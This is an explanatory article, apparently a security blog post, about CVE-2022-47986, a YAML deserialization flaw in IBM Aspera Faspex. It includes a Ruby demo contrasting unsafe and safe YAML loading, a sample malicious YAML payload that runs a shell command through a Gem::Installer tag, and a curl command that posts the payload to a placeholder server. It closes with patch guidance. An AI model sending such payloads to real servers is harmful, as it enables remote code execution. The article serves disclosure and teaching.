CVE-2022-47986 - How a YAML Flaw Let Attackers Run Code on IBM Aspera Faspex
IBM Aspera Faspex is a high-speed file exchange application used by organizations around the world. In early 2023, security researchers identified a critical vulnerability (CVE-2022-47986) in Faspex versions up to 4.4.2 Patch Level 1. This flaw allowed an attacker to run any code they wanted on the server by abusing a dangerous bug in how the application handled YAML files.
Let’s break down how this happened, walk through an example attack, and learn what you should do.
What’s the Vulnerability?
Faspex had an old, seldom-used API endpoint (“obsolete API call”) that parsed YAML input from requests. This endpoint didn't properly validate or sanitize the YAML, so malicious code embedded inside a YAML document would get executed. That’s called a "YAML deserialization vulnerability".
Why YAML is Dangerous
YAML is a data serialization language. When the server receives YAML data and blindly "deserializes" it, it can be tricked into executing commands.
The default (unsafe) load functions in Ruby's and Python's YAML libraries will instantiate arbitrary objects named by tags in the document, not just plain data. If the document comes from an attacker, they pick a class whose construction has side effects, and that is all it takes to sneak in system commands.
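To make the difference concrete, here is an added example (my own demo, not Faspex code or IBM's fix): a harmless Ruby class stands in for a gadget, and the same tagged document is parsed once with the unsafe loader and once with safe_load. The class AuditHook and the document are constructed for this illustration.

```ruby
require 'yaml'

# Constructed stand-in for a gadget class. Psych calls init_with on any
# object it revives from a !ruby/object tag, so a class with a useful
# init_with (or attribute setter) is all a deserialization bug needs.
# This one only records what it was handed; it executes nothing.
class AuditHook
  attr_reader :seen
  def init_with(coder)
    @seen = coder['cmd']
  end
end

# Constructed document: same !ruby/object tag shape as the Faspex payload,
# but naming the harmless class above.
TAGGED_DOC = <<~YAML
  --- !ruby/object:AuditHook
  cmd: "echo hello"
YAML

# Unsafe path: the loader builds whatever class the tag names and runs its
# revival hooks. Psych >= 3.3.2 exposes this as unsafe_load; on older Psych
# plain YAML.load already behaves this way.
def unsafe_parse(doc)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(doc) : YAML.load(doc)
end

# Hardened path: safe_load only builds strings, numbers, arrays and hashes.
# Any !ruby/object tag raises Psych::DisallowedClass instead of constructing
# the class, which is exactly the check the obsolete endpoint lacked.
def safe_parse(doc)
  [:ok, YAML.safe_load(doc)]
rescue Psych::DisallowedClass => e
  [:rejected, e.message]
end

if $PROGRAM_NAME == __FILE__
  obj = unsafe_parse(TAGGED_DOC)
  puts "unsafe loader built #{obj.class} and handed it #{obj.seen.inspect}"
  p safe_parse(TAGGED_DOC)            # tag rejected, no object constructed
  p safe_parse("cmd: echo hello\n")   # [:ok, {"cmd"=>"echo hello"}]
end
```

Run it with a Ruby that has Psych installed; no network or Faspex instance is needed.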
Exploiting CVE-2022-47986 (With Code Example)
Step 1: The attacker finds a Faspex server running a vulnerable version.
Step 2: The server exposes the old API, for example at /faspex/api/obsolete.
Step 3: The attacker sends a POST request to this endpoint with a custom YAML payload whose tags instruct the loader to build a Ruby object that runs a system command.
Example Malicious YAML
The following is a theoretical example for educational purposes. It uses Ruby’s YAML features to call system commands:
--- !ruby/object:Gem::Installer
i: x
gem_home: "|echo pwned > /tmp/hacked.txt"
This tells Ruby’s YAML loader: "Hey, create a Gem::Installer object, and as part of its deserialization, run echo pwned > /tmp/hacked.txt."
Here’s a simple way to send the payload with curl:
curl -X POST \
-H "Content-Type: application/x-yaml" \
--data-binary @payload.yaml \
"https://target_faspex_server/faspex/api/obsolete"
What Happens?
If the server is vulnerable, it will parse the YAML, run the echo pwned > /tmp/hacked.txt command, and the attacker now knows they have code execution.
From there, they can do almost anything: make a reverse shell, exfiltrate data, alter files, or install backdoors.
The Fix
IBM removed the dangerous API endpoint in Aspera Faspex 4.4.2 Patch Level 2.
- Upgrade now: IBM Security Bulletin
- Patch notes in the release changelog
References & More Reading
- IBM Security Bulletin: CVE-2022-47986
- NVD Entry
- IBM X-Force ID: 243512
- YAML Deserialization Vulnerabilities
- How to write secure YAML code (OWASP)
Final Words
CVE-2022-47986 is a textbook example of how a little-used, forgotten API endpoint can punch a hole through your defenses. If you run anything older than Faspex 4.4.2 PL2, upgrade now. And for developers: treat input like it’s radioactive—and never deserialize anything a stranger hands you!
Timeline
Published on: 02/17/2023 16:15:00 UTC
Last modified on: 02/28/2023 14:37:00 UTC